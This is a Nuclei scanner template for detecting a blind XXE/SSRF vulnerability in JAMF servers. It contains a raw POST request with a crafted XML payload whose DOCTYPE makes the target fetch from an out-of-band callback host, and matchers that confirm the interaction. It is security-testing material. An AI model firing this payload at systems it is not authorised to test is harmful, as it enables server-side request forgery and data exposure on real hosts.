nuclei-templates/http/vulnerabilities/jamf/jamf-blind-xxe.yaml

53 lines
1.7 KiB
YAML

id: jamf-blind-xxe
info:
name: JAMF Blind XXE / SSRF
author: pdteam
severity: medium
reference:
- https://www.synack.com/blog/a-deep-dive-into-xxe-injection/
tags: xxe,ssrf,jamf
metadata:
max-request: 1
http:
- raw:
- |
POST /client HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version='1.0' encoding='UTF-8' standalone="no"?>
<!DOCTYPE jamfMessage SYSTEM "http://{{interactsh-url}}/test.xml">
<ns2:jamfMessage xmlns:ns3="http://www.jamfsoftware.com/JAMFCommunicationSettings" xmlns:ns2="http://www.jamfsoftware.com/JAMFMessage">
<device>
<uuid>&test;</uuid>
<macAddresses />
</device>
<application>com.jamfsoftware.jamfdistributionserver</application>
<messageTimestamp>{{unix_time()}}</messageTimestamp>
<content xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="ns2:ResponseContent">
<uuid>00000000-0000-0000-0000-000000000000</uuid>
<commandType>com.jamfsoftware.jamf.distributionserverinventoryrequest</commandType>
<status>
<code>1999</code>
<timestamp>{{unix_time()}}</timestamp>
</status>
<commandData>
<distributionServerInventory>
<ns2:distributionServerID>34</ns2:distributionServerID>
</distributionServerInventory>
</commandData>
</content>
</ns2:jamfMessage>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "http"
- type: word
words:
- "com.jamfsoftware.jss"